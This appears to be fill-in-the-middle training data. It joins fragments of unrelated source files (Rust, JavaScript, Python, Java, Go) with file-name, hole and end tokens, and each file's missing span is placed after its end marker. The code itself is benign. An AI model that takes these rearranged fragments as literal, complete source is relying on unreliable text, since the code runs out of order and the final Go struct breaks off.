pub fn convert_pressure_to_y(pressure: HectoPascal) -> f64 {
(config::MAXP / pressure).log10() / (config::MAXP / config::MINP).log10()
}
/// Provide an inverse function as well.
pub fn convert_y_to_pressure(y: f64) -> HectoPascal {
config::MAXP * (config::MINP / config::MAXP).powf(y)
}
#[test]
fn test_pressure_to_y_and_back() {
use metfor::Quantity;
for i in 100..=1000 {
let p = HectoPascal(i as f64);
let y = convert_pressure_to_y(p);
let pback = convert_y_to_pressure(y);
println!("p = {:?} y = {:?} pback = {:?}", p, y, pback);
assert!((p - pback).abs() < HectoPascal(1.0e-6));
}
}<|fim▁end|> | |
<|file_name|>emojify.js<|end_file_name|><|fim▁begin|>'use strict';
<|fim▁hole|>
var generateEmoji = function(selector) {
if (!existingRules[selector]) {
existingRules[selector] = emojiArr[i];
if (i !== emojiArr.length) {
i++
} else {
i = 0;
}
}
return existingRules[selector];
}
module.exports = generateEmoji;<|fim▁end|> | var emojiArr = require('./emojis');
var i = 0;
var existingRules = {}; |
<|file_name|>0003_auto_20160525_1521.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-<|fim▁hole|>from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('predict', '0002_auto_20160524_0947'),
]
operations = [
migrations.RemoveField(
model_name='predictdataset',
name='dropbox_url',
),
migrations.AlterField(
model_name='predictdataset',
name='file_type',
field=models.CharField(max_length=25, choices=[(b'vcf', b'Variant Call Format (VCF)'), (b'fastq', b'FastQ Nucleotide Sequence'), (b'manual', b'Mutations Manual Entry')]),
),
migrations.AlterField(
model_name='predictdataset',
name='title',
field=models.CharField(max_length=255, verbose_name=b'Dataset Title'),
),
]<|fim▁end|> | |
<|file_name|>sl.js<|end_file_name|><|fim▁begin|>/* Slovenian locals for flatpickr */
var flatpickr = flatpickr || { l10ns: {} };
flatpickr.l10ns.sl = {};
flatpickr.l10ns.sl.weekdays = {
shorthand: ["Ned", "Pon", "Tor", "Sre", "Čet", "Pet", "Sob"],
longhand: ["Nedelja", "Ponedeljek", "Torek", "Sreda", "Četrtek", "Petek", "Sobota"]
};
flatpickr.l10ns.sl.months = {
shorthand: ["Jan", "Feb", "Mar", "Apr", "Maj", "Jun", "Jul", "Avg", "Sep", "Okt", "Nov", "Dec"],
longhand: ["Januar", "Februar", "Marec", "April", "Maj", "Junij", "Julij", "Avgust", "September", "Oktober", "November", "December"]
};
flatpickr.l10ns.sl.firstDayOfWeek = 1;<|fim▁hole|>flatpickr.l10ns.sl.ordinal = function () {
return ".";
};
if (typeof module !== "undefined") module.exports = flatpickr.l10ns;<|fim▁end|> | flatpickr.l10ns.sl.rangeSeparator = " do "; |
<|file_name|>all-rules.js<|end_file_name|><|fim▁begin|>/*
* This file contains generic tests that are run against every rule. Early on,
* we found some common rule patterns that would cause errors under certain
* conditions. Instead of tracking them down individually, this file runs
* the same tests on every defined rule to track down these patterns.
*
* When run in addition to the other tests, this causes the Rhino CLI test
* to fail due to Java stack overflow. This must be run separate from other tests.
*/
(function() {
"use strict";
var Assert = YUITest.Assert,
suite = new YUITest.TestSuite("General Tests for all Rules"),
rules = CSSLint.getRules(),
len = rules.length,
i;
function testAll(i, rules) {
suite.add(new YUITest.TestCase({
name: "General Tests for " + rules[i].id,
setUp: function() {
this.options = {};
this.options[rules[i].id] = 1;
},
"Using @viewport should not result in an error": function() {
var result = CSSLint.verify("@viewport { width: auto; }", this.options);
Assert.areEqual(0, result.messages.length);
},
"Using @keyframes should not result in an error": function() {
var result = CSSLint.verify("@keyframes resize { 0% {padding: 0;} 50% {padding: 0;} 100% {padding: 0;}}", this.options);
Assert.areEqual(0, result.messages.length);
},
"Using @page should not result in an error": function() {<|fim▁hole|> Assert.areEqual(0, result.messages.length);
},
"Using @page @top-left should not result in an error": function() {
var result = CSSLint.verify("@page { @top-left { content: ''; } }", this.options);
Assert.areEqual(0, result.messages.length);
},
"Using a regular rule should not result in an error": function() {
var result = CSSLint.verify("body { margin: 0; }", this.options);
Assert.areEqual(0, result.messages.length);
}
}));
}
for (i = 0; i < len; i++) {
testAll(i, rules);
}
YUITest.TestRunner.add(suite);
})();<|fim▁end|> | var result = CSSLint.verify("@page { width: 100px; }", this.options); |
<|file_name|>value.py<|end_file_name|><|fim▁begin|>def represents_int(value):
try:
int(value)<|fim▁hole|>
return False
def bytes_to_gib(byte_value, round_digits=2):
return round(byte_value / 1024 / 1024 / float(1024), round_digits)
def count_to_millions(count_value, round_digits=3):
return round(count_value / float(1000000), round_digits)<|fim▁end|> | return True
except ValueError: |
<|file_name|>test_feature_version.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
import mc_unittest
from rogerthat.bizz.profile import create_user_profile
from rogerthat.bizz.system import update_app_asset_response
from rogerthat.capi.system import updateAppAsset
from rogerthat.dal.mobile import get_mobile_settings_cached
from rogerthat.models.properties.profiles import MobileDetails
from rogerthat.rpc import users
from rogerthat.rpc.models import Mobile
from rogerthat.rpc.rpc import logError
from rogerthat.to.app import UpdateAppAssetRequestTO
class Test(mc_unittest.TestCase):
def testSendNews(self):
self.set_datastore_hr_probability(1)
scale_x = 1
request = UpdateAppAssetRequestTO(u"kind", u"url", scale_x)
app_user = users.User('[email protected]')
user_profile = create_user_profile(app_user, 'geert', language='en')
mobile = users.get_current_mobile()
user_profile.mobiles = MobileDetails()
user_profile.mobiles.addNew(mobile.account, Mobile.TYPE_ANDROID_HTTP, None, u"rogerthat")
user_profile.put()
ms = get_mobile_settings_cached(mobile)
ms.majorVersion = 0
ms.minorVersion = 2447
ms.put()
updateAppAsset(update_app_asset_response, logError, app_user, request=request)
ms.minorVersion = 2449
ms.put()
<|fim▁hole|><|fim▁end|> | updateAppAsset(update_app_asset_response, logError, app_user, request=request) |
<|file_name|>issue-57180.rs<|end_file_name|><|fim▁begin|>// compile-flags: -Cmetadata=aux
pub trait Trait {
}
pub struct Struct<F>
{
_p: ::std::marker::PhantomData<F>,
}
<|fim▁hole|> F: Fn() -> u32,
{
}<|fim▁end|> | impl<F: Fn() -> u32>
Trait for Struct<F>
where |
<|file_name|>CompletionParticipantTest.java<|end_file_name|><|fim▁begin|>/**
* Copyright (c) 2005-2013 by Appcelerator, Inc. All Rights Reserved.
* Licensed under the terms of the Eclipse Public License (EPL).
* Please see the license.txt included with this distribution for details.
* Any modifications to this file must keep this entire header intact.
*/
/*
* Created on 25/08/2005
*
* @author Fabio Zadrozny
*/
package com.python.pydev.codecompletion.participant;
import java.io.File;
import org.eclipse.core.runtime.preferences.IEclipsePreferences;
import org.eclipse.jface.text.Document;
import org.python.pydev.ast.codecompletion.PyCodeCompletion;
import org.python.pydev.ast.codecompletion.PyCodeCompletionPreferences;
import org.python.pydev.ast.codecompletion.revisited.modules.SourceToken;
import org.python.pydev.core.IToken;
import org.python.pydev.core.TestDependent;
import org.python.pydev.core.TokensList;
import org.python.pydev.core.proposals.CompletionProposalFactory;
import org.python.pydev.editor.actions.PySelectionTest;
import org.python.pydev.editor.codecompletion.proposals.CtxInsensitiveImportComplProposal;
import org.python.pydev.editor.codecompletion.proposals.DefaultCompletionProposalFactory;
import org.python.pydev.parser.jython.ast.Import;
import org.python.pydev.parser.jython.ast.NameTok;
import org.python.pydev.parser.jython.ast.aliasType;
import org.python.pydev.shared_core.code_completion.ICompletionProposalHandle;
import org.python.pydev.shared_core.preferences.InMemoryEclipsePreferences;
import com.python.pydev.analysis.AnalysisPreferences;
import com.python.pydev.analysis.additionalinfo.AdditionalInfoTestsBase;
import com.python.pydev.codecompletion.ctxinsensitive.CtxParticipant;
public class CompletionParticipantTest extends AdditionalInfoTestsBase {
public static void main(String[] args) {
CompletionParticipantTest test = new CompletionParticipantTest();
try {
test.setUp();
test.testImportCompletionFromZip();
test.tearDown();
junit.textui.TestRunner.run(CompletionParticipantTest.class);
} catch (Throwable e) {
e.printStackTrace();
}
}
@Override
public void setUp() throws Exception {
// forceAdditionalInfoRecreation = true; -- just for testing purposes
super.setUp();
codeCompletion = new PyCodeCompletion();
CompletionProposalFactory.set(new DefaultCompletionProposalFactory());
}
@Override
public void tearDown() throws Exception {
super.tearDown();
PyCodeCompletionPreferences.getPreferencesForTests = null;
CompletionProposalFactory.set(null);
}
@Override
protected String getSystemPythonpathPaths() {
return TestDependent.getCompletePythonLib(true, isPython3Test()) + "|" + TestDependent.TEST_PYSRC_TESTING_LOC
+ "myzipmodule.zip"
+ "|"
+ TestDependent.TEST_PYSRC_TESTING_LOC + "myeggmodule.egg";
}
public void testImportCompletion() throws Exception {
participant = new ImportsCompletionParticipant();
//check simple
ICompletionProposalHandle[] proposals = requestCompl(
"unittest", -1, -1, new String[] { "unittest", "unittest - testlib" }); //the unittest module and testlib.unittest
Document document = new Document("unittest");
ICompletionProposalHandle p0 = null;
ICompletionProposalHandle p1 = null;
for (ICompletionProposalHandle p : proposals) {
String displayString = p.getDisplayString();
if (displayString.equals("unittest")) {
p0 = p;
} else if (displayString.equals("unittest - testlib")) {
p1 = p;
}
}
if (p0 == null) {
fail("Could not find unittest import");
}
if (p1 == null) {
fail("Could not find unittest - testlib import");
}
((CtxInsensitiveImportComplProposal) p0).indentString = " ";
((CtxInsensitiveImportComplProposal) p0).apply(document, ' ', 0, 8);
PySelectionTest.checkStrEquals("import unittest\r\nunittest", document.get());
document = new Document("unittest");
((CtxInsensitiveImportComplProposal) p1).indentString = " ";
((CtxInsensitiveImportComplProposal) p1).apply(document, ' ', 0, 8);
PySelectionTest.checkStrEquals("from testlib import unittest\r\nunittest", document.get());
document = new Document("unittest");
final IEclipsePreferences prefs = new InMemoryEclipsePreferences();
PyCodeCompletionPreferences.getPreferencesForTests = () -> prefs;
document = new Document("unittest");
prefs.putBoolean(PyCodeCompletionPreferences.APPLY_COMPLETION_ON_DOT, false);
((CtxInsensitiveImportComplProposal) p1).indentString = " ";
((CtxInsensitiveImportComplProposal) p1).apply(document, '.', 0, 8);
PySelectionTest.checkStrEquals("unittest.", document.get());
document = new Document("unittest");
prefs.putBoolean(PyCodeCompletionPreferences.APPLY_COMPLETION_ON_DOT, true);
((CtxInsensitiveImportComplProposal) p1).indentString = " ";
((CtxInsensitiveImportComplProposal) p1).apply(document, '.', 0, 8);
PySelectionTest.checkStrEquals("from testlib import unittest\r\nunittest.", document.get());
//for imports, the behavior never changes
AnalysisPreferences.TESTS_DO_IGNORE_IMPORT_STARTING_WITH_UNDER = true;
try {
proposals = requestCompl("_priv3", new String[] { "_priv3 - relative.rel1._priv1._priv2" });
document = new Document("_priv3");
((CtxInsensitiveImportComplProposal) proposals[0]).indentString = " ";
((CtxInsensitiveImportComplProposal) proposals[0]).apply(document, ' ', 0, 6);
PySelectionTest.checkStrEquals("from relative.rel1._priv1._priv2 import _priv3\r\n_priv3", document.get());
} finally {
AnalysisPreferences.TESTS_DO_IGNORE_IMPORT_STARTING_WITH_UNDER = false;
}
//check on actual file
requestCompl(new File(TestDependent.TEST_PYSRC_TESTING_LOC + "/testlib/unittest/guitestcase.py"), "guite", -1,
0,<|fim▁hole|> null) });
this.imports = new TokensList(new IToken[] { new SourceToken(importTok, "unittest", "", "", "", null) });
requestCompl("import unittest\nunittest", new String[] {}); //none because the import for unittest is already there
requestCompl("import unittest\nunittes", new String[] {}); //the local import for unittest (won't actually show anything because we're only exercising the participant test)
this.imports = null;
}
public void testImportCompletionFromZip2() throws Exception {
participant = new ImportsCompletionParticipant();
ICompletionProposalHandle[] proposals = requestCompl("myzip", -1, -1, new String[] {});
assertContains("myzipfile - myzipmodule", proposals);
assertContains("myzipmodule", proposals);
proposals = requestCompl("myegg", -1, -1, new String[] {});
assertContains("myeggfile - myeggmodule", proposals);
assertContains("myeggmodule", proposals);
}
public void testImportCompletionFromZip() throws Exception {
participant = new CtxParticipant();
ICompletionProposalHandle[] proposals = requestCompl("myzipc", -1, -1, new String[] {});
assertContains("MyZipClass - myzipmodule.myzipfile", proposals);
proposals = requestCompl("myegg", -1, -1, new String[] {});
assertContains("MyEggClass - myeggmodule.myeggfile", proposals);
}
public void testImportCompletion2() throws Exception {
participant = new CtxParticipant();
ICompletionProposalHandle[] proposals = requestCompl("xml", -1, -1, new String[] {});
assertNotContains("xml - xmlrpclib", proposals);
requestCompl(new File(TestDependent.TEST_PYSRC_TESTING_LOC + "/testlib/unittest/guitestcase.py"), "guite", -1,
0,
new String[] {});
//the behavior changes for tokens on modules
AnalysisPreferences.TESTS_DO_IGNORE_IMPORT_STARTING_WITH_UNDER = true;
try {
proposals = requestCompl("Priv3", new String[] { "Priv3 - relative.rel1._priv1._priv2._priv3" });
Document document = new Document("Priv3");
((CtxInsensitiveImportComplProposal) proposals[0]).indentString = " ";
((CtxInsensitiveImportComplProposal) proposals[0]).apply(document, ' ', 0, 5);
PySelectionTest.checkStrEquals("from relative.rel1 import Priv3\r\nPriv3", document.get());
} finally {
AnalysisPreferences.TESTS_DO_IGNORE_IMPORT_STARTING_WITH_UNDER = false;
}
}
}<|fim▁end|> | new String[] {});
Import importTok = new Import(new aliasType[] { new aliasType(new NameTok("unittest", NameTok.ImportModule), |
<|file_name|>boot.js<|end_file_name|><|fim▁begin|>import test from 'ava';
import { spawn } from 'child_process';
test.cb('app should boot without exiting', (t) => {
const cli = spawn('node', [ './cli' ]);
cli.stderr.on('data', (param) => {
console.log(param.toString());
});
cli.on('close', (code) => {
t.fail(`app failed to boot ${code}`);
});
<|fim▁hole|> setTimeout(() => {
t.pass();
t.end();
cli.kill();
}, 500);
});<|fim▁end|> | |
<|file_name|>custom_user_data_test.go<|end_file_name|><|fim▁begin|>package instance
import (
"io/ioutil"
"os"
"testing"
"github.com/scaleway/scaleway-cli/internal/core"
)
func Test_UserDataGet(t *testing.T) {
t.Run("Get an existing key", core.Test(&core.TestConfig{
BeforeFunc: core.BeforeFuncCombine(
createServer("Server"),
core.ExecBeforeCmd("scw instance user-data set server-id={{.Server.ID}} key=happy content=true"),
),
Commands: GetCommands(),
Cmd: "scw instance user-data get server-id={{.Server.ID}} key=happy",
AfterFunc: deleteServer("Server"),
Check: core.TestCheckCombine(
core.TestCheckGolden(),
core.TestCheckExitCode(0),
),
}))
t.Run("Get an nonexistent key", core.Test(&core.TestConfig{
BeforeFunc: createServer("Server"),
Commands: GetCommands(),
Cmd: "scw instance user-data get server-id={{.Server.ID}} key=happy",
AfterFunc: deleteServer("Server"),
Check: core.TestCheckCombine(
core.TestCheckGolden(),
core.TestCheckExitCode(1),
),
}))
}
func Test_UserDataList(t *testing.T) {
t.Run("Simple", core.Test(&core.TestConfig{
BeforeFunc: core.BeforeFuncCombine(
createServer("Server"),
core.ExecBeforeCmd("scw instance user-data set server-id={{ .Server.ID }} key=foo content=bar"),
core.ExecBeforeCmd("scw instance user-data set server-id={{ .Server.ID }} key=bar content=foo"),
),
Commands: GetCommands(),
Cmd: "scw instance user-data list server-id={{ .Server.ID }}",
AfterFunc: deleteServer("Server"),
Check: core.TestCheckCombine(
core.TestCheckGolden(),
core.TestCheckExitCode(0),
),
}))
}
func Test_UserDataFileUpload(t *testing.T) {
content := "cloud-init file content"
t.Run("on-cloud-init", core.Test(&core.TestConfig{
Commands: GetCommands(),
BeforeFunc: core.BeforeFuncCombine(
core.ExecStoreBeforeCmd("Server", "scw instance server create stopped=true image=ubuntu-bionic"),
func(ctx *core.BeforeFuncCtx) error {
file, _ := ioutil.TempFile("", "test")
_, _ = file.WriteString(content)
ctx.Meta["filePath"] = file.Name()
return nil
},
),
Cmd: `scw instance user-data set key=cloud-init server-id={{ .Server.ID }} content=@{{ .filePath }}`,
Check: core.TestCheckCombine(
core.TestCheckGolden(),
),
AfterFunc: core.AfterFuncCombine(
func(ctx *core.AfterFuncCtx) error {
_ = os.RemoveAll(ctx.Meta["filePath"].(string))
return nil
},
),
}))<|fim▁hole|> Commands: GetCommands(),
BeforeFunc: core.BeforeFuncCombine(
core.ExecStoreBeforeCmd("Server", "scw instance server create stopped=true image=ubuntu-bionic"),
func(ctx *core.BeforeFuncCtx) error {
file, _ := ioutil.TempFile("", "test")
_, _ = file.WriteString(content)
ctx.Meta["filePath"] = file.Name()
return nil
},
),
Cmd: `scw instance user-data set key=foobar server-id={{ .Server.ID }} content=@{{ .filePath }}`,
Check: core.TestCheckCombine(
core.TestCheckGolden(),
),
AfterFunc: core.AfterFuncCombine(
func(ctx *core.AfterFuncCtx) error {
_ = os.RemoveAll(ctx.Meta["filePath"].(string))
return nil
},
),
}))
}<|fim▁end|> |
t.Run("on-random-key", core.Test(&core.TestConfig{ |
<|file_name|>TooltipDemo.js<|end_file_name|><|fim▁begin|>/**
* @license
* Copyright 2014 Google Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
CLASS({
name: 'TooltipDemo',
package: 'foam.ui.polymer.demo',
extends: 'foam.ui.View',
requires: [
'foam.ui.polymer.demo.ElementWithTooltip',
'foam.ui.polymer.Tooltip'
],
properties: [
{
type: 'String',
name: 'right',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Right'
},
{
type: 'String',
name: 'top',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Top'
},
{<|fim▁hole|> name: 'left',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Left'
},
{
type: 'String',
name: 'bottom',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Bottom'
},
{
type: 'String',
name: 'noArrow',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'NoArrow'
},
{
type: 'String',
name: 'richText',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'RichText'
},
{
type: 'String',
name: 'show',
view: 'foam.ui.polymer.demo.ElementWithTooltip',
defaultValue: 'Show'
}
],
templates: [
function toHTML() {/*
<div class="centeredDiv">
$$top{ tooltipConfig: {
text: 'Tooltip on the top',
position: 'top'
} }
</div><div class="centeredDiv">
$$left{ tooltipConfig: {
text: 'Tooltip on the left',
position: 'left'
} }
</div><div class="centeredDiv">
$$right{ tooltipConfig: {
text: 'Tooltip on the right',
position: 'right'
} }
</div><div class="centeredDiv">
$$bottom{ tooltipConfig: {
text: 'Tooltip on the bottom',
position: 'bottom'
} }
</div><div class="centeredDiv">
$$noArrow{ tooltipConfig: {
text: 'Tooltip without arrow',
noarrow: true
} }
</div><div class="centeredDiv">
$$richText{ tooltipConfig: {
html: 'Tooltip with <b>rich</b> <i>text</i>'
} }
</div><div class="centeredDiv">
$$show{ tooltipConfig: {
text: 'Tooltip always shown',
show: true
} }
</div>
*/},
function CSS() {/*
.centeredDiv { cursor: pointer; width: 0; margin: 0 auto; }
*/}
]
});<|fim▁end|> | type: 'String', |
<|file_name|>test_recaptcha.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""Copyright (C) 2013 COLDWELL AG
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import loader
loader.init()
import gevent
import requests
from client import interface, event
from client.captcha import recaptcha
def send_input(e, input):
gevent.spawn_later(0.1, interface.call, 'input', 'answer', id=input.id, answer={'captcha': 'invalid test recaptcha answer'})
def test_recaptcha():
browser = requests.session()
resp = browser.get("http://www.google.com/recaptcha/demo/")
challenge_id = recaptcha.parse(resp.text)
result, challenge = recaptcha.solve(browser, challenge_id)
<|fim▁hole|> try:
assert "Correct" in resp.text or "Incorrect" in resp.text or "Richtig" in resp.text or "Falsch" in resp.text or "Rangt." in resp.text or u"Rétt!" in resp.text or u"Feil." in resp.text or u"Fel." in resp.text
except:
print resp.text
raise
test_recaptcha.setUp = lambda: event.add("input:request", send_input)
test_recaptcha.tearDown = lambda: event.remove('input:request', send_input)
if __name__ == '__main__':
test_recaptcha()<|fim▁end|> | data = {"recaptcha_challenge_field": challenge, "recaptcha_response_field": result}
resp = browser.post("http://www.google.com/recaptcha/demo/", data=data)
|
<|file_name|>dynamic-form-question.component.ts<|end_file_name|><|fim▁begin|>// #docregion
import { Component, Input } from '@angular/core';
import { ControlGroup } from '@angular/common';
import { QuestionBase } from './question-base';
@Component({
selector: 'df-question',
templateUrl: 'app/dynamic-form-question.component.html'
})<|fim▁hole|> get isValid() { return this.form.controls[this.question.key].valid; }
}<|fim▁end|> | export class DynamicFormQuestionComponent {
@Input() question: QuestionBase<any>;
@Input() form: ControlGroup; |
<|file_name|>lookup-get-basic-example-1.6.x.py<|end_file_name|><|fim▁begin|># Download the Python helper library from twilio.com/docs/python/install
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
account_sid = "ACCOUNT_SID"
auth_token = "your_auth_token"
client = Client(account_sid, auth_token)
number = client.lookups.phone_numbers("+15108675309").fetch(type="carrier")<|fim▁hole|><|fim▁end|> |
print(number.carrier['type'])
print(number.carrier['name']) |
<|file_name|>gen-dq-textbox.go<|end_file_name|><|fim▁begin|>// old skool dw textbox:
// gen-dq-textbox dw.png
<|fim▁hole|>// gen-dq-textbox -bg "rgb(100,100,200)" -xbg "rgb(0,0,0)" -mbg 0.125 ff.png
package main
import (
"flag"
"fmt"
"image"
"image/color"
"log"
"math"
"os"
"github.com/qeedquan/go-media/image/chroma"
"github.com/qeedquan/go-media/image/imageutil"
)
var flags struct {
Width int
Height int
Thickness int
MFG, MBG float64
FG, XFG color.RGBA
BG, XBG color.RGBA
}
func main() {
log.SetFlags(0)
log.SetPrefix("gen-dq-textbox: ")
parseFlags()
m := gen(flags.Width, flags.Height, flags.Thickness, flags.FG, flags.BG,
flags.XFG, flags.XBG, flags.MFG, flags.MBG)
err := imageutil.WriteRGBAFile(flag.Arg(0), m)
ck(err)
}
func ck(err error) {
if err != nil {
log.Fatal(err)
}
}
func parseFlags() {
var dim, fg, bg, xfg, xbg string
flag.StringVar(&dim, "d", "1024x128", "image dimension")
flag.StringVar(&fg, "fg", "#ffffff", "foreground color")
flag.StringVar(&bg, "bg", "#000000", "backround color")
flag.StringVar(&xfg, "xfg", "", "foreground color gradient")
flag.StringVar(&xbg, "xbg", "", "background color gradient")
flag.IntVar(&flags.Thickness, "t", 8, "thickness")
flag.Float64Var(&flags.MFG, "mfg", 0, "multiple step size for foreground linear gradient")
flag.Float64Var(&flags.MBG, "mbg", 0, "multiple step size for background linear gradient")
flag.Usage = usage
flag.Parse()
if flag.NArg() < 1 {
usage()
}
fmt.Sscanf(dim, "%dx%d", &flags.Width, &flags.Height)
flags.FG = parseRGBA(fg)
flags.BG = parseRGBA(bg)
flags.XFG = flags.FG
flags.XBG = flags.BG
if xfg != "" {
flags.XFG = parseRGBA(xfg)
}
if xbg != "" {
flags.XBG = parseRGBA(xbg)
}
if flags.MFG == 0 {
flags.MFG = 1.0 / float64(flags.Thickness)
}
if flags.MBG == 0 {
flags.MBG = 1.0 / float64(flags.Height)
}
}
func parseRGBA(s string) color.RGBA {
c, err := chroma.ParseRGBA(s)
ck(err)
return c
}
func usage() {
fmt.Fprintln(os.Stderr, "usage: gen-dq-textbox [options] output")
flag.PrintDefaults()
os.Exit(2)
}
func gen(w, h int, thickness int, fg, bg, xfg, xbg color.RGBA, mfg, mbg float64) *image.RGBA {
r := image.Rect(0, 0, w, h)
m := image.NewRGBA(r)
// bg
for y := r.Min.Y; y < r.Max.Y; y++ {
for x := r.Min.X; x < r.Max.X; x++ {
t := float64(y-r.Min.Y) / float64(r.Max.Y-r.Min.Y)
t = multiple(t, mbg)
c := mix(bg, xbg, t)
m.Set(x, y, c)
}
}
// border
s := r.Inset(8)
for x := s.Min.X; x < s.Max.X; x++ {
for y := 0; y < thickness; y++ {
t := float64(y) / float64(thickness)
t = multiple(t, mfg)
c := mix(fg, xfg, t)
m.Set(x, s.Min.Y+y, c)
m.Set(x, s.Max.Y-y-1, c)
}
}
for y := s.Min.Y; y < s.Max.Y; y++ {
for x := 0; x < thickness; x++ {
t := float64(x) / float64(thickness)
t = multiple(t, mfg)
c := mix(fg, xfg, t)
m.Set(s.Min.X+x, y, c)
m.Set(s.Max.X-x-1, y, c)
}
}
// round
n := thickness * 3 / 4
for y := 0; y < n; y++ {
for x := 0; x < n; x++ {
t := float64(s.Min.Y+y-s.Min.Y) / float64(s.Max.Y-s.Min.Y)
t = multiple(t, mbg)
bg1 := mix(bg, xbg, t)
t = float64(s.Max.Y-y-s.Min.Y) / float64(s.Max.Y-s.Min.Y)
t = multiple(t, mbg)
bg2 := mix(bg, xbg, t)
m.Set(s.Min.X+x, s.Min.Y+y, bg1)
m.Set(s.Min.X+x+thickness, s.Min.Y+y+thickness, fg)
m.Set(s.Max.X-x, s.Min.Y+y, bg1)
m.Set(s.Max.X-x-thickness, s.Min.Y+y+thickness, fg)
m.Set(s.Min.X+x, s.Max.Y-y, bg2)
m.Set(s.Min.X+x+thickness, s.Max.Y-y-thickness, fg)
m.Set(s.Max.X-x, s.Max.Y-y, bg2)
m.Set(s.Max.X-x-thickness, s.Max.Y-y-thickness, fg)
}
}
return m
}
func mix(a, b color.RGBA, t float64) color.RGBA {
return color.RGBA{
uint8(float64(a.R)*(1-t) + t*float64(b.R)),
uint8(float64(a.G)*(1-t) + t*float64(b.G)),
uint8(float64(a.B)*(1-t) + t*float64(b.B)),
uint8(float64(a.A)*(1-t) + t*float64(b.A)),
}
}
func multiple(a, m float64) float64 {
return math.Ceil(a/m) * m
}<|fim▁end|> | // old skool ff textbox:
|
<|file_name|>grid.py<|end_file_name|><|fim▁begin|>import bisect
import string
from abc import ABC, abstractmethod
from typing import Optional
from django.conf import settings
class AbstractGrid(ABC):
enabled = False
@abstractmethod
def get_square_for_point(self, x, y) -> Optional[str]:
pass
@abstractmethod
def get_squares_for_bounds(self, bounds) -> Optional[str]:
pass
class Grid(AbstractGrid):
enabled = True
def __init__(self, rows, cols):
rows = tuple(float(y) for y in rows)
cols = tuple(float(x) for x in cols)
self.rows = tuple(sorted(rows))
self.cols = tuple(sorted(cols))
if self.rows == rows:
self.invert_y = False
elif self.rows == tuple(reversed(rows)):
self.invert_y = True
else:
raise ValueError('row coordinates are not ordered')
if self.cols == cols:
self.invert_x = False
elif self.cols == tuple(reversed(cols)):
self.invert_x = True
else:
raise ValueError('column coordinates are not ordered')
def get_square_for_point(self, x, y):
x = bisect.bisect(self.cols, x)
if x <= 0 or x >= len(self.cols):
return None
y = bisect.bisect(self.rows, y)
if y <= 0 or y >= len(self.rows):
return None
if self.invert_x:
x = len(self.cols) - x
if self.invert_y:
y = len(self.rows) - y
return '%s%d' % (string.ascii_uppercase[x-1], y)
def get_squares_for_bounds(self, bounds):
minx, miny, maxx, maxy = bounds
if self.invert_x:
minx, maxx = maxx, minx
if self.invert_y:
miny, maxy = maxy, miny
min_square = self.get_square_for_point(minx, miny)
max_square = self.get_square_for_point(maxx, maxy)
if not min_square or not max_square:
return None
if min_square == max_square:
return min_square
return '%s-%s' % (min_square, max_square)
class DummyGrid(AbstractGrid):
def get_square_for_point(self, x, y):<|fim▁hole|>
def get_squares_for_bounds(self, bounds):
return None
if settings.GRID_COLS and settings.GRID_ROWS:
grid = Grid(settings.GRID_ROWS.split(','), settings.GRID_COLS.split(','))
else:
grid = DummyGrid()<|fim▁end|> | return None |
<|file_name|>test_hazard_metadata.py<|end_file_name|><|fim▁begin|># coding=utf-8<|fim▁hole|>
from safe.common.utilities import unique_filename
from safe.metadata import HazardLayerMetadata
__copyright__ = "Copyright 2016, The InaSAFE Project"
__license__ = "GPL version 3"
__email__ = "[email protected]"
__revision__ = '$Format:%H$'
class TestHazardMetadata(TestCase):
def test_standard_properties(self):
metadata = HazardLayerMetadata(unique_filename())
with self.assertRaises(KeyError):
metadata.get_property('non_existing_key')
# from BaseMetadata
metadata.get_property('email')
# from HazardLayerMetadata
metadata.get_property('hazard')
metadata.get_property('hazard_category')
metadata.get_property('continuous_hazard_unit')
metadata.get_property('thresholds')
metadata.get_property('value_maps')<|fim▁end|> | """Test Hazard Metadata."""
from unittest import TestCase |
<|file_name|>chat_msg.go<|end_file_name|><|fim▁begin|>package googlechat
import "time"
// ChatMessage is message type from Pub/Sub events
type ChatMessage struct {
Type string `json:"type"`
EventTime time.Time `json:"eventTime"`
Token string `json:"token"`
Message struct {
Name string `json:"name"`
Sender struct {
Name string `json:"name"`
DisplayName string `json:"displayName"`
AvatarURL string `json:"avatarUrl"`
Email string `json:"email"`
Type string `json:"type"`
} `json:"sender"`
CreateTime time.Time `json:"createTime"`
Text string `json:"text"`
Thread struct {
Name string `json:"name"`
RetentionSettings struct {
State string `json:"state"`
} `json:"retentionSettings"`
} `json:"thread"`
Space struct {
Name string `json:"name"`
Type string `json:"type"`
} `json:"space"`
ArgumentText string `json:"argumentText"`
} `json:"message"`
User struct {
